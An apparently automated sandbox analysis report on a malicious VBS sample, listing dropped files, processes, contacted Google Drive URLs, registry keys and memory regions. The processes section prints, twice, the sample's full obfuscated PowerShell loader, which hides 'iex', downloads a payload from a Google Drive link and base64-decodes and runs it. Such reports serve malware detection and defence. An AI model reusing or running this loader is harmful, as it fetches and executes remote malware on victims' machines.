Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
2669976595_366408723_KHI_SOF_240702_0957_P.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3yfehvc.v3c.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lf4slyuy.rhq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lsjybhop.hxc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xygt1gtw.iip.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Noncongestion.For
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis
Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous
Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene
Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt
Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes
Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For(
$kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function
Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW
AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo
S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat
a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol
GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu
';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling
' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr
sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee
FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl
RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK
i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU
iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling
'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe
ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF
vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling
' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni lP eB.(B,$SaU.onirdGegfal bdSueBrs S, .$TeASqr ,cF,h,ni TnIn)Am
';$Archin=$Fuset[0];Convictively (Reeling ',a$Fog tlSuoAlbIna.alMa:G.R .e,erN aYakMaeGa= e(InT Se.lsVit C- aP.raCotGehCh Di$F,AUnr.ic
ghUfi fn L)Di ');while (!$Rerake) {Convictively (Reeling 'Op$.vgHylReoF.b ha Al D:TuST tAuoSurDimb a Ds tC.=Ro$ FtG.rMaulyeDr
') ;Convictively $promachos;Convictively (Reeling ' USGatBraTar Pt B-AuSG.l eeCheUnp H ,r4Ez ');Convictively (Reeling ' U$A,g
PlBloa,bPeaKllCe:FoRP.ePhrPraVakt,e ,=An(flTRoeC,sGytse-T.P,iaS teghRe Ut$S.A Hr ncsah EiH.nLi)Tu ') ;Convictively (Reeling
',i$SagSklfooslbPha VlEl: EmCiy koidpMua tr Da olI y,ns.oiBusK,=.v$LegUmlVkoLibMaaH l F: .S foOur yt.rkF.r GiV.di.tI sSat
eElgFrnL,iConOsgSoeKarSun,teBr+An+F %Bi$PeR,piPrvSciRenAtiQuaU nMi. CcSeoHauConE,tHv ') ;$Undgldes=$Rivinian[$myoparalysis];}$Forblndede=332547;$Antisiphon=26001;Convictively
(Reeling ' u$ lgLel,eoBebUnaTal :MaBP,lU.yT,a SnAmt Ws tEne EgG n oi EnBrg.seOvrVi I=N gGSke t .-SpC boUdn.ut Ce Dn
.t na$ AAF,rEfc Th Si.nnEt ');Convictively (Reeling ' T$G,gB lFeoReb GaTrl P:HeSFukheiSem,omE.ePht S St=Oc Ve[TrS Sy.us
StR,eBemPr.L,CAdo ,n .vIne ,rCatBa].o: b: FG.r ,o,amDiBCha Ds ,eTr6s.4H S,et rP,iM n Ag B( .$saBSalMoyB,aF,n,atU.sArt ,e
xgSpn,liRlntrgInestrBe)Z. ');Convictively (Reeling 'Ta$H,g .lShoNub AaK.lCe:ChPJorRev MeFlkSprDetLi S =my T.[ USR.yU,sEntTreBomT
.OtTPre Mx,ft ,.ThE nApcVao AdTaiHanDjgM ]Gr:Pa:BaA S.oC I,xISt.s GMyeFot,tSI tRir Cio nF.gRa( T$ MS,bkNaiLem imVaeFotI,)Ta
');Convictively (Reeling 'Co$Bug ,lMoo bReaFal R:.yB.ne prK.cMae Eaa uSa=Ko$DePf.rT vsoe KkVorElt ,. sViu ob Cs Mt .rOpiLin
SgNn(Jo$emF loDerCibBolArn KdumeStdFoeSp,Hj$ EA Bn,rt NiFrsT,iBrpShhR.oFynPa) G ');Convictively $Berceau;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis
Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous
Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene
Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt
Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes
Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For(
$kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function
Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW
AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo
S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat
a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol
GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu
';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling
' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr
sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee
FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl
RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK
i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU
iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling
'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe
ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF
vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling
' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni lP eB.(B,$SaU.onirdGegfal bdSueBrs S, .$TeASqr ,cF,h,ni TnIn)Am
';$Archin=$Fuset[0];Convictively (Reeling ',a$Fog tlSuoAlbIna.alMa:G.R .e,erN aYakMaeGa= e(InT Se.lsVit C- aP.raCotGehCh Di$F,AUnr.ic
ghUfi fn L)Di ');while (!$Rerake) {Convictively (Reeling 'Op$.vgHylReoF.b ha Al D:TuST tAuoSurDimb a Ds tC.=Ro$ FtG.rMaulyeDr
') ;Convictively $promachos;Convictively (Reeling ' USGatBraTar Pt B-AuSG.l eeCheUnp H ,r4Ez ');Convictively (Reeling ' U$A,g
PlBloa,bPeaKllCe:FoRP.ePhrPraVakt,e ,=An(flTRoeC,sGytse-T.P,iaS teghRe Ut$S.A Hr ncsah EiH.nLi)Tu ') ;Convictively (Reeling
',i$SagSklfooslbPha VlEl: EmCiy koidpMua tr Da olI y,ns.oiBusK,=.v$LegUmlVkoLibMaaH l F: .S foOur yt.rkF.r GiV.di.tI sSat
eElgFrnL,iConOsgSoeKarSun,teBr+An+F %Bi$PeR,piPrvSciRenAtiQuaU nMi. CcSeoHauConE,tHv ') ;$Undgldes=$Rivinian[$myoparalysis];}$Forblndede=332547;$Antisiphon=26001;Convictively
(Reeling ' u$ lgLel,eoBebUnaTal :MaBP,lU.yT,a SnAmt Ws tEne EgG n oi EnBrg.seOvrVi I=N gGSke t .-SpC boUdn.ut Ce Dn
.t na$ AAF,rEfc Th Si.nnEt ');Convictively (Reeling ' T$G,gB lFeoReb GaTrl P:HeSFukheiSem,omE.ePht S St=Oc Ve[TrS Sy.us
StR,eBemPr.L,CAdo ,n .vIne ,rCatBa].o: b: FG.r ,o,amDiBCha Ds ,eTr6s.4H S,et rP,iM n Ag B( .$saBSalMoyB,aF,n,atU.sArt ,e
xgSpn,liRlntrgInestrBe)Z. ');Convictively (Reeling 'Ta$H,g .lShoNub AaK.lCe:ChPJorRev MeFlkSprDetLi S =my T.[ USR.yU,sEntTreBomT
.OtTPre Mx,ft ,.ThE nApcVao AdTaiHanDjgM ]Gr:Pa:BaA S.oC I,xISt.s GMyeFot,tSI tRir Cio nF.gRa( T$ MS,bkNaiLem imVaeFotI,)Ta
');Convictively (Reeling 'Co$Bug ,lMoo bReaFal R:.yB.ne prK.cMae Eaa uSa=Ko$DePf.rT vsoe KkVorElt ,. sViu ob Cs Mt .rOpiLin
SgNn(Jo$emF loDerCibBolArn KdumeStdFoeSp,Hj$ EA Bn,rt NiFrsT,iBrpShhR.oFynPa) G ');Convictively $Berceau;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
https://drive.goog
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://drive.google.com/uc?ex
|
unknown
|
||
|
https://drive.google.com/u
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://drive.usercontent.google.comh
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://drive.google.
|
unknown
|
||
|
https://drive.go
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://drive.goo
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://drive.g
|
unknown
|
||
|
https://drive.google.com/uc
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
https://drive.googl
|
unknown
|
||
|
https://drive.google.com/uc?e
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://drive.google.c
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://crl.microsoftuP
|
unknown
|
||
|
https://drive.google.com/uc?
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://drive.google
|
unknown
|
||
|
https://drive.google.co
|
unknown
|
There are 28 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
142.250.186.78
|
||
|
drive.usercontent.google.com
|
142.250.186.161
|
||
|
windowsupdatebg.s.llnwi.net
|
87.248.204.0
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.250.186.78
|
drive.google.com
|
United States
|
||
|
142.250.186.161
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
632B000
|
trusted library allocation
|
page read and write
|
|
|
|
247F39E9000
|
trusted library allocation
|
page read and write
|
|
|
|
247E1C30000
|
trusted library section
|
page read and write
|
||
|
643FCF7000
|
stack
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
247FBF72000
|
heap
|
page read and write
|
||
|
8BEB000
|
stack
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
247E3640000
|
trusted library allocation
|
page read and write
|
||
|
89D0000
|
heap
|
page read and write
|
||
|
7FFB4AF01000
|
trusted library allocation
|
page read and write
|
||
|
247FC200000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
247E1FE0000
|
heap
|
page readonly
|
||
|
7FFB4AE36000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B050000
|
trusted library allocation
|
page read and write
|
||
|
8F2E000
|
stack
|
page read and write
|
||
|
8C70000
|
heap
|
page read and write
|
||
|
247E5779000
|
trusted library allocation
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
4E40000
|
trusted library allocation
|
page read and write
|
||
|
247F3C63000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B020000
|
trusted library allocation
|
page read and write
|
||
|
7500000
|
heap
|
page execute and read and write
|
||
|
643F97E000
|
stack
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
23822C64000
|
heap
|
page read and write
|
||
|
7D50000
|
heap
|
page execute and read and write
|
||
|
349B000
|
heap
|
page read and write
|
||
|
7FFB4AD5D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4AFB0000
|
trusted library allocation
|
page read and write
|
||
|
23822C64000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23820DB9000
|
heap
|
page read and write
|
||
|
4E60000
|
trusted library allocation
|
page read and write
|
||
|
7505000
|
heap
|
page execute and read and write
|
||
|
23820D69000
|
heap
|
page read and write
|
||
|
23822C50000
|
heap
|
page read and write
|
||
|
89BE000
|
stack
|
page read and write
|
||
|
643FDFE000
|
stack
|
page read and write
|
||
|
4E53000
|
trusted library allocation
|
page execute and read and write
|
||
|
7CA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AFC0000
|
trusted library allocation
|
page read and write
|
||
|
23822E04000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23822DBD000
|
heap
|
page read and write
|
||
|
247FBEC8000
|
heap
|
page read and write
|
||
|
773E000
|
stack
|
page read and write
|
||
|
247E1C50000
|
heap
|
page read and write
|
||
|
23820D7D000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
7C53000
|
heap
|
page read and write
|
||
|
7EB0000
|
trusted library allocation
|
page read and write
|
||
|
23822DC2000
|
heap
|
page read and write
|
||
|
7FFB4AE0C000
|
trusted library allocation
|
page execute and read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23822C47000
|
heap
|
page read and write
|
||
|
247F3981000
|
trusted library allocation
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23822DD2000
|
heap
|
page read and write
|
||
|
33BF000
|
stack
|
page read and write
|
||
|
23822EBE000
|
heap
|
page read and write
|
||
|
8CFF000
|
heap
|
page read and write
|
||
|
8C2E000
|
stack
|
page read and write
|
||
|
4EA0000
|
trusted library allocation
|
page read and write
|
||
|
777C000
|
stack
|
page read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23820D8E000
|
heap
|
page read and write
|
||
|
4E5D000
|
trusted library allocation
|
page execute and read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
247FBF75000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
2B1D000
|
stack
|
page read and write
|
||
|
7F9B000
|
stack
|
page read and write
|
||
|
247FBF33000
|
heap
|
page read and write
|
||
|
4FFD000
|
stack
|
page read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
247FBEB7000
|
heap
|
page execute and read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
7FFB4AF32000
|
trusted library allocation
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
15285C00000
|
heap
|
page read and write
|
||
|
2BCE000
|
unkown
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
7FFB4AF80000
|
trusted library allocation
|
page read and write
|
||
|
23822E41000
|
heap
|
page read and write
|
||
|
247E38FC000
|
heap
|
page read and write
|
||
|
4E82000
|
trusted library allocation
|
page read and write
|
||
|
7BB9000
|
heap
|
page read and write
|
||
|
8EA0000
|
trusted library allocation
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
7FFB4B0C0000
|
trusted library allocation
|
page read and write
|
||
|
2BD0000
|
heap
|
page read and write
|
||
|
7FFB4B080000
|
trusted library allocation
|
page read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
3330000
|
heap
|
page read and write
|
||
|
247E3921000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
32BD000
|
stack
|
page read and write
|
||
|
7C63000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
15285DD0000
|
heap
|
page read and write
|
||
|
7E1E000
|
stack
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
643FFFB000
|
stack
|
page read and write
|
||
|
238230EB000
|
heap
|
page read and write
|
||
|
247E3A04000
|
trusted library allocation
|
page read and write
|
||
|
247E3690000
|
heap
|
page read and write
|
||
|
23822DC2000
|
heap
|
page read and write
|
||
|
23822D77000
|
heap
|
page read and write
|
||
|
23822D71000
|
heap
|
page read and write
|
||
|
23822E04000
|
heap
|
page read and write
|
||
|
6440B4B000
|
stack
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23822DAA000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
7A8F000
|
stack
|
page read and write
|
||
|
247E3E49000
|
trusted library allocation
|
page read and write
|
||
|
8FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
743E000
|
stack
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
247E1C9E000
|
heap
|
page read and write
|
||
|
23822C64000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
7FFB4AFF0000
|
trusted library allocation
|
page read and write
|
||
|
506E000
|
stack
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
7FFB4AF60000
|
trusted library allocation
|
page read and write
|
||
|
8BAC000
|
stack
|
page read and write
|
||
|
7F2E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
8927000
|
stack
|
page read and write
|
||
|
23822E04000
|
heap
|
page read and write
|
||
|
247E36AA000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
247FBED4000
|
heap
|
page read and write
|
||
|
7FFB4B030000
|
trusted library allocation
|
page read and write
|
||
|
2EFE000
|
stack
|
page read and write
|
||
|
23822D77000
|
heap
|
page read and write
|
||
|
23822DD9000
|
heap
|
page read and write
|
||
|
23822E62000
|
heap
|
page read and write
|
||
|
23822D77000
|
heap
|
page read and write
|
||
|
23820DB9000
|
heap
|
page read and write
|
||
|
643FC77000
|
stack
|
page read and write
|
||
|
7FFB4B090000
|
trusted library allocation
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
7A0E000
|
stack
|
page read and write
|
||
|
7DDE000
|
stack
|
page read and write
|
||
|
7FFB4AFE0000
|
trusted library allocation
|
page read and write
|
||
|
3505000
|
heap
|
page read and write
|
||
|
643FAFE000
|
stack
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
4E70000
|
trusted library allocation
|
page read and write
|
||
|
247E1C98000
|
heap
|
page read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
7F00000
|
trusted library allocation
|
page read and write
|
||
|
8F6D000
|
stack
|
page read and write
|
||
|
74BE000
|
stack
|
page read and write
|
||
|
23822E04000
|
heap
|
page read and write
|
||
|
247E3882000
|
heap
|
page read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
15285DF0000
|
heap
|
page read and write
|
||
|
23822E90000
|
heap
|
page read and write
|
||
|
7E70000
|
trusted library allocation
|
page execute and read and write
|
||
|
23822E04000
|
heap
|
page read and write
|
||
|
247E3EAD000
|
trusted library allocation
|
page read and write
|
||
|
23822DBD000
|
heap
|
page read and write
|
||
|
15285BC0000
|
heap
|
page read and write
|
||
|
23822E04000
|
heap
|
page read and write
|
||
|
23820DE1000
|
heap
|
page read and write
|
||
|
247E1C9A000
|
heap
|
page read and write
|
||
|
7BA0000
|
heap
|
page read and write
|
||
|
247E37E0000
|
heap
|
page read and write
|
||
|
247E3DEF000
|
trusted library allocation
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
23820D98000
|
heap
|
page read and write
|
||
|
247E1FD0000
|
trusted library allocation
|
page read and write
|
||
|
643F9FD000
|
stack
|
page read and write
|
||
|
3546000
|
heap
|
page read and write
|
||
|
4E50000
|
trusted library allocation
|
page read and write
|
||
|
23823041000
|
heap
|
page read and write
|
||
|
247E41DB000
|
trusted library allocation
|
page read and write
|
||
|
3050000
|
heap
|
page read and write
|
||
|
7F30000
|
trusted library allocation
|
